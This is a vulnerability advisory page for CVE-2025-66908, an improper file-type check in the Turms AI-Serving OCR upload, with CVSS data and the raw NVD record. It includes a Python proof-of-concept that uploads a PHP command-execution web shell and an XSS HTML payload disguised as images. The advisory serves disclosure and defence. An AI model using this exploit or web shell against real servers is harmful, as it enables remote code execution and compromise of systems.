Security Vulnerability Report
中文
CVE-2025-66908 CVSS 5.3 MEDIUM

CVE-2025-66908

Published: 2025-12-19 15:15:57
Last Modified: 2026-01-02 19:57:20
Source: [email protected]

Description

Turms AI-Serving module v0.10.0-SNAPSHOT and earlier contains an improper file type validation vulnerability in the OCR image upload functionality. The OcrController in turms-ai-serving/src/main/java/im/turms/ai/domain/ocr/controller/OcrController.java uses the @FormData(contentType = MediaTypeConst.IMAGE) annotation to restrict uploads to image files, but this constraint is not properly enforced. The system relies solely on client-provided Content-Type headers and file extensions without validating actual file content using magic bytes (file signatures). An attacker can upload arbitrary file types including executables, scripts, HTML, or web shells by setting the Content-Type header to "image/*" or using an image file extension. This bypass enables potential server-side code execution, stored XSS, or information disclosure depending on how uploaded files are processed and served.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:turms-im:turms:0.10.0-snapshot:*:*:*:*:*:*:* - VULNERABLE
Turms AI-Serving v0.10.0-SNAPSHOT
Turms AI-Serving 所有 v0.10.0-SNAPSHOT 及更早版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-66908 PoC - File Type Validation Bypass in Turms AI-Serving OCR Upload # This PoC demonstrates uploading an arbitrary file disguised as an image def upload_malicious_file(target_url, file_content, filename): """ Upload a malicious file with fake image Content-Type header """ headers = { 'Content-Type': 'image/png' # Bypass Content-Type check } # Prepare multipart form data files = { 'file': (filename, file_content, 'image/png') } try: response = requests.post(target_url, headers=headers, files=files, timeout=10) print(f'[+] Response Status: {response.status_code}') print(f'[+] Response Body: {response.text[:500]}') return response except requests.exceptions.RequestException as e: print(f'[-] Request failed: {e}') return None def create_webshell(): """Generate PHP webshell content""" return b'<?php if(isset($_GET["cmd"])){ system($_GET["cmd"]); } ?>' def create_html_xss(): """Generate HTML file with XSS payload""" return b'<html><script>alert("XSS");</script></html>' if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve-2025-66908_poc.py <target_url>') print('Example: python cve-2025-66908_poc.py http://target.com/api/ocr/upload') sys.exit(1) target = sys.argv[1] # Test 1: Upload PHP webshell with .png extension print('[*] Test 1: Uploading PHP webshell disguised as PNG...') webshell = create_webshell() upload_malicious_file(target, webshell, 'shell.png') # Test 2: Upload HTML file with XSS payload print('[*] Test 2: Uploading HTML file with XSS payload...') html_payload = create_html_xss() upload_malicious_file(target, html_payload, 'xss.html') print('[*] If files are accessible, visit them to execute the payload')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66908", "sourceIdentifier": "[email protected]", "published": "2025-12-19T15:15:56.550", "lastModified": "2026-01-02T19:57:20.190", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Turms AI-Serving module v0.10.0-SNAPSHOT and earlier contains an improper file type validation vulnerability in the OCR image upload functionality. The OcrController in turms-ai-serving/src/main/java/im/turms/ai/domain/ocr/controller/OcrController.java uses the @FormData(contentType = MediaTypeConst.IMAGE) annotation to restrict uploads to image files, but this constraint is not properly enforced. The system relies solely on client-provided Content-Type headers and file extensions without validating actual file content using magic bytes (file signatures). An attacker can upload arbitrary file types including executables, scripts, HTML, or web shells by setting the Content-Type header to \"image/*\" or using an image file extension. This bypass enables potential server-side code execution, stored XSS, or information disclosure depending on how uploaded files are processed and served."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:turms-im:turms:0.10.0-snapshot:*:*:*:*:*:*:*", "matchCriteriaId": "9466432E-2863-4A5B-913F-E6E64090F60B"}]}]}], "references": [{"url": "https://github.com/Xzzz111/public_cve_report/blob/main/CVE-2025-66908_report.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/turms-im/turms", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/turms-im/turms/blob/develop/turms-ai-serving/src/main/java/im/turms/ai/domain/ocr/controller/OcrController.java", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/Xzzz111/public_cve_report/blob/main/CVE-2025-66908_report.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.